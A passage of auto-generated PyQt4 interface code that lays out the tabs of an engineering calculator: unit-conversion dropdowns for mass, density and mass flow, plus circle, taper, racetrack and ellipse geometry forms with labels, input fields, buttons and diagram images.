self.comboBoxFromMass.addItem(_fromUtf8(""))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromMass, 7, 1, 2, 1)
self.comboBoxToMass = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToMass.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToMass.setFont(font)
self.comboBoxToMass.setObjectName(_fromUtf8("comboBoxToMass"))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToMass, 7, 2, 2, 1)
self.comboBoxFromDensity = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromDensity.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromDensity.setFont(font)
self.comboBoxFromDensity.setObjectName(_fromUtf8("comboBoxFromDensity"))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromDensity, 9, 1, 2, 1)
self.comboBoxToDensity = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToDensity.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToDensity.setFont(font)
self.comboBoxToDensity.setObjectName(_fromUtf8("comboBoxToDensity"))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToDensity, 9, 2, 2, 1)
self.comboBoxFromMassFlow = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromMassFlow.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromMassFlow.setFont(font)
self.comboBoxFromMassFlow.setObjectName(_fromUtf8("comboBoxFromMassFlow"))
self.comboBoxFromMassFlow.addItem(_fromUtf8(""))
self.comboBoxFromMassFlow.addItem(_fromUtf8(""))
self.comboBoxFromMassFlow.addItem(_fromUtf8(""))
self.comboBoxFromMassFlow.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromMassFlow, 11, 1, 2, 1)
self.comboBoxToMassFlow = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToMassFlow.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToMassFlow.setFont(font)
self.comboBoxToMassFlow.setObjectName(_fromUtf8("comboBoxToMassFlow"))
self.comboBoxToMassFlow.addItem(_fromUtf8(""))
self.comboBoxToMassFlow.addItem(_fromUtf8(""))
self.comboBoxToMassFlow.addItem(_fromUtf8(""))
self.comboBoxToMassFlow.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToMassFlow, 11, 2, 2, 1)
self.verticalLayout_6.addLayout(self.gridLayout)
self.horizontalLayout_13 = QtGui.QHBoxLayout()
self.horizontalLayout_13.setObjectName(_fromUtf8("horizontalLayout_13"))
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_13.addItem(spacerItem)
self.btnConvert = QtGui.QPushButton(self.tabUnitConversion)
self.btnConvert.setMinimumSize(QtCore.QSize(200, 0))
self.btnConvert.setMaximumSize(QtCore.QSize(200, 16777215))
font = QtGui.QFont()
font.setPointSize(9)
self.btnConvert.setFont(font)
self.btnConvert.setObjectName(_fromUtf8("btnConvert"))
self.horizontalLayout_13.addWidget(self.btnConvert)
self.verticalLayout_6.addLayout(self.horizontalLayout_13)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_6.addItem(spacerItem1)
self.btnConversions.addTab(self.tabUnitConversion, _fromUtf8(""))
self.tabCircles = QtGui.QWidget()
self.tabCircles.setObjectName(_fromUtf8("tabCircles"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.tabCircles)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.labelCircleTitle = QtGui.QLabel(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(14)
font.setUnderline(False)
self.labelCircleTitle.setFont(font)
self.labelCircleTitle.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelCircleTitle.setObjectName(_fromUtf8("labelCircleTitle"))
self.verticalLayout_3.addWidget(self.labelCircleTitle)
self.labelInputCircle = QtGui.QLabel(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(9)
self.labelInputCircle.setFont(font)
self.labelInputCircle.setObjectName(_fromUtf8("labelInputCircle"))
self.verticalLayout_3.addWidget(self.labelInputCircle)
self.formLayout_2 = QtGui.QFormLayout()
self.formLayout_2.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout_2.setLabelAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.formLayout_2.setObjectName(_fromUtf8("formLayout_2"))
self.labelDiameter = QtGui.QLabel(self.tabCircles)
self.labelDiameter.setMinimumSize(QtCore.QSize(250, 0))
self.labelDiameter.setObjectName(_fromUtf8("labelDiameter"))
self.formLayout_2.setWidget(0, QtGui.QFormLayout.LabelRole, self.labelDiameter)
self.txtCLS_Diamter = QtGui.QLineEdit(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(11)
self.txtCLS_Diamter.setFont(font)
self.txtCLS_Diamter.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtCLS_Diamter.setObjectName(_fromUtf8("txtCLS_Diamter"))
self.formLayout_2.setWidget(0, QtGui.QFormLayout.FieldRole, self.txtCLS_Diamter)
self.labelArea = QtGui.QLabel(self.tabCircles)
self.labelArea.setLayoutDirection(QtCore.Qt.LeftToRight)
self.labelArea.setObjectName(_fromUtf8("labelArea"))
self.formLayout_2.setWidget(1, QtGui.QFormLayout.LabelRole, self.labelArea)
self.txtCLS_Area = QtGui.QLineEdit(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(11)
self.txtCLS_Area.setFont(font)
self.txtCLS_Area.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtCLS_Area.setObjectName(_fromUtf8("txtCLS_Area"))
self.formLayout_2.setWidget(1, QtGui.QFormLayout.FieldRole, self.txtCLS_Area)
self.labelCircumference = QtGui.QLabel(self.tabCircles)
self.labelCircumference.setObjectName(_fromUtf8("labelCircumference"))
self.formLayout_2.setWidget(2, QtGui.QFormLayout.LabelRole, self.labelCircumference)
self.txtCLS_Circumference = QtGui.QLineEdit(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(11)
self.txtCLS_Circumference.setFont(font)
self.txtCLS_Circumference.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtCLS_Circumference.setObjectName(_fromUtf8("txtCLS_Circumference"))
self.formLayout_2.setWidget(2, QtGui.QFormLayout.FieldRole, self.txtCLS_Circumference)
self.verticalLayout_3.addLayout(self.formLayout_2)
self.horizontalLayout_11 = QtGui.QHBoxLayout()
self.horizontalLayout_11.setObjectName(_fromUtf8("horizontalLayout_11"))
spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_11.addItem(spacerItem2)
self.btnCircles = QtGui.QPushButton(self.tabCircles)
self.btnCircles.setMinimumSize(QtCore.QSize(200, 0))
self.btnCircles.setMaximumSize(QtCore.QSize(200, 16777215))
font = QtGui.QFont()
font.setPointSize(9)
self.btnCircles.setFont(font)
self.btnCircles.setObjectName(_fromUtf8("btnCircles"))
self.horizontalLayout_11.addWidget(self.btnCircles)
self.verticalLayout_3.addLayout(self.horizontalLayout_11)
self.horizontalLayout_12 = QtGui.QHBoxLayout()
self.horizontalLayout_12.setObjectName(_fromUtf8("horizontalLayout_12"))
spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_12.addItem(spacerItem3)
self.imageCircle = QtGui.QLabel(self.tabCircles)
self.imageCircle.setMaximumSize(QtCore.QSize(345, 124))
self.imageCircle.setText(_fromUtf8(""))
self.imageCircle.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_circle.png")))
self.imageCircle.setScaledContents(True)
self.imageCircle.setObjectName(_fromUtf8("imageCircle"))
self.horizontalLayout_12.addWidget(self.imageCircle)
spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_12.addItem(spacerItem4)
self.verticalLayout_3.addLayout(self.horizontalLayout_12)
spacerItem5 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_3.addItem(spacerItem5)
self.btnConversions.addTab(self.tabCircles, _fromUtf8(""))
self.tabTaper = QtGui.QWidget()
self.tabTaper.setObjectName(_fromUtf8("tabTaper"))
self.verticalLayout_2 = QtGui.QVBoxLayout(self.tabTaper)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.labelTaperTitle = QtGui.QLabel(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(14)
self.labelTaperTitle.setFont(font)
self.labelTaperTitle.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTaperTitle.setObjectName(_fromUtf8("labelTaperTitle"))
self.verticalLayout_2.addWidget(self.labelTaperTitle)
self.labelTaperInput = QtGui.QLabel(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(9)
self.labelTaperInput.setFont(font)
self.labelTaperInput.setObjectName(_fromUtf8("labelTaperInput"))
self.verticalLayout_2.addWidget(self.labelTaperInput)
self.formLayout = QtGui.QFormLayout()
self.formLayout.setObjectName(_fromUtf8("formLayout"))
self.labelAngle = QtGui.QLabel(self.tabTaper)
self.labelAngle.setMinimumSize(QtCore.QSize(250, 0))
self.labelAngle.setObjectName(_fromUtf8("labelAngle"))
self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.labelAngle)
self.labelDiameter1 = QtGui.QLabel(self.tabTaper)
self.labelDiameter1.setObjectName(_fromUtf8("labelDiameter1"))
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.labelDiameter1)
self.labelDiameter2 = QtGui.QLabel(self.tabTaper)
self.labelDiameter2.setObjectName(_fromUtf8("labelDiameter2"))
self.formLayout.setWidget(2, QtGui.QFormLayout.LabelRole, self.labelDiameter2)
self.labelLength = QtGui.QLabel(self.tabTaper)
self.labelLength.setObjectName(_fromUtf8("labelLength"))
self.formLayout.setWidget(3, QtGui.QFormLayout.LabelRole, self.labelLength)
self.txtTA_Angle = QtGui.QLineEdit(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(11)
self.txtTA_Angle.setFont(font)
self.txtTA_Angle.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtTA_Angle.setObjectName(_fromUtf8("txtTA_Angle"))
self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.txtTA_Angle)
self.txtTA_Diameter1 = QtGui.QLineEdit(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(11)
self.txtTA_Diameter1.setFont(font)
self.txtTA_Diameter1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtTA_Diameter1.setObjectName(_fromUtf8("txtTA_Diameter1"))
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.txtTA_Diameter1)
self.txtTA_Diameter2 = QtGui.QLineEdit(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(11)
self.txtTA_Diameter2.setFont(font)
self.txtTA_Diameter2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtTA_Diameter2.setObjectName(_fromUtf8("txtTA_Diameter2"))
self.formLayout.setWidget(2, QtGui.QFormLayout.FieldRole, self.txtTA_Diameter2)
self.txtTA_Length = QtGui.QLineEdit(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(11)
self.txtTA_Length.setFont(font)
self.txtTA_Length.setStyleSheet(_fromUtf8(""))
self.txtTA_Length.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtTA_Length.setReadOnly(False)
self.txtTA_Length.setObjectName(_fromUtf8("txtTA_Length"))
self.formLayout.setWidget(3, QtGui.QFormLayout.FieldRole, self.txtTA_Length)
self.verticalLayout_2.addLayout(self.formLayout)
self.horizontalLayout_9 = QtGui.QHBoxLayout()
self.horizontalLayout_9.setObjectName(_fromUtf8("horizontalLayout_9"))
spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_9.addItem(spacerItem6)
self.btnTaper = QtGui.QPushButton(self.tabTaper)
self.btnTaper.setMinimumSize(QtCore.QSize(200, 0))
self.btnTaper.setMaximumSize(QtCore.QSize(200, 16777215))
font = QtGui.QFont()
font.setPointSize(9)
self.btnTaper.setFont(font)
self.btnTaper.setObjectName(_fromUtf8("btnTaper"))
self.horizontalLayout_9.addWidget(self.btnTaper)
self.verticalLayout_2.addLayout(self.horizontalLayout_9)
self.horizontalLayout_10 = QtGui.QHBoxLayout()
self.horizontalLayout_10.setObjectName(_fromUtf8("horizontalLayout_10"))
spacerItem7 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_10.addItem(spacerItem7)
self.imageTaper = QtGui.QLabel(self.tabTaper)
self.imageTaper.setMaximumSize(QtCore.QSize(352, 194))
self.imageTaper.setText(_fromUtf8(""))
self.imageTaper.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_taper.png")))
self.imageTaper.setScaledContents(True)
self.imageTaper.setObjectName(_fromUtf8("imageTaper"))
self.horizontalLayout_10.addWidget(self.imageTaper)
spacerItem8 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_10.addItem(spacerItem8)
self.verticalLayout_2.addLayout(self.horizontalLayout_10)
spacerItem9 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_2.addItem(spacerItem9)
self.btnConversions.addTab(self.tabTaper, _fromUtf8(""))
self.tabRaceTrack = QtGui.QWidget()
self.tabRaceTrack.setObjectName(_fromUtf8("tabRaceTrack"))
self.verticalLayout_4 = QtGui.QVBoxLayout(self.tabRaceTrack)
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.labelTitleRT = QtGui.QLabel(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(14)
self.labelTitleRT.setFont(font)
self.labelTitleRT.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleRT.setObjectName(_fromUtf8("labelTitleRT"))
self.verticalLayout_4.addWidget(self.labelTitleRT)
self.labelInputRT = QtGui.QLabel(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(9)
self.labelInputRT.setFont(font)
self.labelInputRT.setObjectName(_fromUtf8("labelInputRT"))
self.verticalLayout_4.addWidget(self.labelInputRT)
self.formLayout_3 = QtGui.QFormLayout()
self.formLayout_3.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout_3.setObjectName(_fromUtf8("formLayout_3"))
self.labelRTx = QtGui.QLabel(self.tabRaceTrack)
self.labelRTx.setMinimumSize(QtCore.QSize(250, 0))
self.labelRTx.setObjectName(_fromUtf8("labelRTx"))
self.formLayout_3.setWidget(0, QtGui.QFormLayout.LabelRole, self.labelRTx)
self.txtRTRK_x = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRTRK_x.setFont(font)
self.txtRTRK_x.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_x.setObjectName(_fromUtf8("txtRTRK_x"))
self.formLayout_3.setWidget(0, QtGui.QFormLayout.FieldRole, self.txtRTRK_x)
self.labelRTy = QtGui.QLabel(self.tabRaceTrack)
self.labelRTy.setObjectName(_fromUtf8("labelRTy"))
self.formLayout_3.setWidget(1, QtGui.QFormLayout.LabelRole, self.labelRTy)
self.txtRTRK_y = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRTRK_y.setFont(font)
self.txtRTRK_y.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_y.setObjectName(_fromUtf8("txtRTRK_y"))
self.formLayout_3.setWidget(1, QtGui.QFormLayout.FieldRole, self.txtRTRK_y)
self.labelRTarea = QtGui.QLabel(self.tabRaceTrack)
self.labelRTarea.setObjectName(_fromUtf8("labelRTarea"))
self.formLayout_3.setWidget(3, QtGui.QFormLayout.LabelRole, self.labelRTarea)
self.txtRTRK_csa = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtRTRK_csa.setFont(font)
self.txtRTRK_csa.setStyleSheet(_fromUtf8(""))
self.txtRTRK_csa.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_csa.setReadOnly(False)
self.txtRTRK_csa.setObjectName(_fromUtf8("txtRTRK_csa"))
self.formLayout_3.setWidget(3, QtGui.QFormLayout.FieldRole, self.txtRTRK_csa)
self.labelRTcircumference = QtGui.QLabel(self.tabRaceTrack)
self.labelRTcircumference.setObjectName(_fromUtf8("labelRTcircumference"))
self.formLayout_3.setWidget(4, QtGui.QFormLayout.LabelRole, self.labelRTcircumference)
self.txtRTRK_cfm = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtRTRK_cfm.setFont(font)
self.txtRTRK_cfm.setStyleSheet(_fromUtf8(""))
self.txtRTRK_cfm.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_cfm.setReadOnly(False)
self.txtRTRK_cfm.setObjectName(_fromUtf8("txtRTRK_cfm"))
self.formLayout_3.setWidget(4, QtGui.QFormLayout.FieldRole, self.txtRTRK_cfm)
self.LabelRTz = QtGui.QLabel(self.tabRaceTrack)
self.LabelRTz.setObjectName(_fromUtf8("LabelRTz"))
self.formLayout_3.setWidget(2, QtGui.QFormLayout.LabelRole, self.LabelRTz)
self.txtRTRK_z = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRTRK_z.setFont(font)
self.txtRTRK_z.setAutoFillBackground(False)
self.txtRTRK_z.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.txtRTRK_z.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_z.setReadOnly(True)
self.txtRTRK_z.setObjectName(_fromUtf8("txtRTRK_z"))
self.formLayout_3.setWidget(2, QtGui.QFormLayout.FieldRole, self.txtRTRK_z)
self.verticalLayout_4.addLayout(self.formLayout_3)
self.horizontalLayout_5 = QtGui.QHBoxLayout()
self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
spacerItem10 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_5.addItem(spacerItem10)
self.btnRacetrack = QtGui.QPushButton(self.tabRaceTrack)
self.btnRacetrack.setMinimumSize(QtCore.QSize(200, 0))
self.btnRacetrack.setMaximumSize(QtCore.QSize(200, 16777215))
font = QtGui.QFont()
font.setPointSize(9)
self.btnRacetrack.setFont(font)
self.btnRacetrack.setObjectName(_fromUtf8("btnRacetrack"))
self.horizontalLayout_5.addWidget(self.btnRacetrack)
self.verticalLayout_4.addLayout(self.horizontalLayout_5)
self.horizontalLayout_6 = QtGui.QHBoxLayout()
self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
spacerItem11 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem11)
self.imageRacetrack = QtGui.QLabel(self.tabRaceTrack)
self.imageRacetrack.setMaximumSize(QtCore.QSize(400, 139))
self.imageRacetrack.setText(_fromUtf8(""))
self.imageRacetrack.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_racetrack.png")))
self.imageRacetrack.setScaledContents(True)
self.imageRacetrack.setObjectName(_fromUtf8("imageRacetrack"))
self.horizontalLayout_6.addWidget(self.imageRacetrack)
spacerItem12 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem12)
self.verticalLayout_4.addLayout(self.horizontalLayout_6)
spacerItem13 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_4.addItem(spacerItem13)
self.btnConversions.addTab(self.tabRaceTrack, _fromUtf8(""))
self.tabEllipse = QtGui.QWidget()
self.tabEllipse.setObjectName(_fromUtf8("tabEllipse"))
self.verticalLayout_5 = QtGui.QVBoxLayout(self.tabEllipse)
self.verticalLayout_5.setObjectName(_fromUtf8("verticalLayout_5"))
self.labelTitleEllipse = QtGui.QLabel(self.tabEllipse)
font = QtGui.QFont()
font.setPointSize(14)
self.labelTitleEllipse.setFont(font)
self.labelTitleEllipse.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleEllipse.setObjectName(_fromUtf8("labelTitleEllipse"))
self.verticalLayout_5.addWidget(self.labelTitleEllipse)
self.labelInputEllipse = QtGui.QLabel(self.tabEllipse)
font = QtGui.QFont()
font.setPointSize(9)
self.labelInputEllipse.setFont(font)
self.labelInputEllipse.setObjectName(_fromUtf8("labelInputEllipse"))
self.verticalLayout_5.addWidget(self.labelInputEllipse)
self.formLayout_4 = QtGui.QFormLayout()
self.formLayout_4.setObjectName(_fromUtf8("formLayout_4"))
self.labelSMajor = QtGui.QLabel(self.tabEllipse)
self.labelSMajor.setMinimumSize(QtCore.QSize(250, 0))
self.labelSMajor.setObjectName(_fromUtf8("labelSMajor"))
self.formLayout_4.setWidget(0, QtGui.QFormLayout.LabelRole, self.labelSMajor)
self.labelSMinor = QtGui.QLabel(self.tabEllipse)
self.labelSMinor.setObjectName(_fromUtf8("labelSMinor"))
self.formLayout_4.setWidget(1, QtGui.QFormLayout.LabelRole, self.labelSMinor)
self.labelEArea = QtGui.QLabel(self.tabEllipse)
self.labelEArea.setObjectName(_fromUtf8("labelEArea"))
self.formLayout_4.setWidget(2, QtGui.QFormLayout.LabelRole, self.labelEArea)
self.labelEcircumference = QtGui.QLabel(self.tabEllipse)
self.labelEcircumference.setObjectName(_fromUtf8("labelEcircumference"))
self.formLayout_4.setWidget(3, QtGui.QFormLayout.LabelRole, self.labelEcircumference)
self.txtEllipses_semimajor = QtGui.QLineEdit(self.tabEllipse)
font = QtGui.QFont()
font.setPointSize(11)
self.txtEllipses_semimajor.setFont(font)
self.txtEllipses_semimajor.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtEllipses_semimajor.setObjectName(_fromUtf8("txtEllipses_semimajor"))
self.formLayout_4.setWidget(0, QtGui.QFormLayout.FieldRole, self.txtEllipses_semimajor)
self.txtEllipses_semiminor = QtGui.QLineEdit(self.tabEllipse)
font = QtGui.QFont()
font.setPointSize(11)
self.txtEllipses_semiminor.setFont(font)
self.txtEllipses_semiminor.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtEllipses_semiminor.setObjectName(_fromUtf8("txtEllipses_semiminor"))
self.formLayout_4.setWidget(1, QtGui.QFormLayout.FieldRole, self.txtEllipses_semiminor)
self.txtEllipses_csa = QtGui.QLineEdit(self.tabEllipse)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtEllipses_csa.setFont(font)
self.txtEllipses_csa.setStyleSheet(_fromUtf8(""))
self.txtEllipses_csa.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtEllipses_csa.setReadOnly(False)
self.txtEllipses_csa.setObjectName(_fromUtf8("txtEllipses_csa"))
self.formLayout_4.setWidget(2, QtGui.QFormLayout.FieldRole, self.txtEllipses_csa)
self.txtEllipses_circumference = QtGui.QLineEdit(self.tabEllipse)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtEllipses_circumference.setFont(font)
self.txtEllipses_circumference.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.txtEllipses_circumference.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtEllipses_circumference.setReadOnly(True)
self.txtEllipses_circumference.setObjectName(_fromUtf8("txtEllipses_circumference"))
self.formLayout_4.setWidget(3, QtGui.QFormLayout.FieldRole, self.txtEllipses_circumference)
self.verticalLayout_5.addLayout(self.formLayout_4)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
spacerItem14 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem14)
self.btnEllipses = QtGui.QPushButton(self.tabEllipse)
self.btnEllipses.setMinimumSize(QtCore.QSize(200, 0))
self.btnEllipses.setMaximumSize(QtCore.QSize(200, 16777215))
self.btnEllipses.setObjectName(_fromUtf8("btnEllipses"))
self.horizontalLayout_3.addWidget(self.btnEllipses)
self.verticalLayout_5.addLayout(self.horizontalLayout_3)
self.horizontalLayout_4 = QtGui.QHBoxLayout()
self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
spacerItem15 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem15)
self.imageEllipse = QtGui.QLabel(self.tabEllipse)
self.imageEllipse.setMaximumSize(QtCore.QSize(329, 204))
self.imageEllipse.setText(_fromUtf8(""))
self.imageEllipse.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_elipse.png")))
self.imageEllipse.setScaledContents(True)
self.imageEllipse.setObjectName(_fromUtf8("imageEllipse"))
self.horizontalLayout_4.addWidget(self.imageEllipse)
spacerItem16 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem16)
self.verticalLayout_5.addLayout(self.horizontalLayout_4)
spacerItem17 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_5.addItem(spacerItem17)
self.btnConversions.addTab(self.tabEllipse, _fromUtf8(""))
self.tab = QtGui.QWidget()
self.tab.setObjectName(_fromUtf8("tab"))
self.verticalLayout_7 = QtGui.QVBoxLayout(self.tab)
self.verticalLayout_7.setObjectName(_fromUtf8("verticalLayout_7"))
self.label_5 = QtGui.QLabel(self.tab)
font = QtGui.QFont()
font.setPointSize(14)
self.label_5.setFont(font)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.verticalLayout_7.addWidget(self.label_5)
self.label_6 = QtGui.QLabel(self.tab)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.verticalLayout_7.addWidget(self.label_6)
self.gridLayout_2 = QtGui.QGridLayout()
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.label_10 = QtGui.QLabel(self.tab)
self.label_10.setObjectName(_fromUtf8("label_10"))
self.gridLayout_2.addWidget(self.label_10, 4, 0, 1, 1)
self.label_8 = QtGui.QLabel(self.tab)
self.label_8.setObjectName(_fromUtf8("label_8"))
self.gridLayout_2.addWidget(self.label_8, 1, 0, 1, 1)
self.label_9 = QtGui.QLabel(self.tab)
self.label_9.setObjectName(_fromUtf8("label_9"))
self.gridLayout_2.addWidget(self.label_9, 2, 0, 1, 1)
self.label_7 = QtGui.QLabel(self.tab)
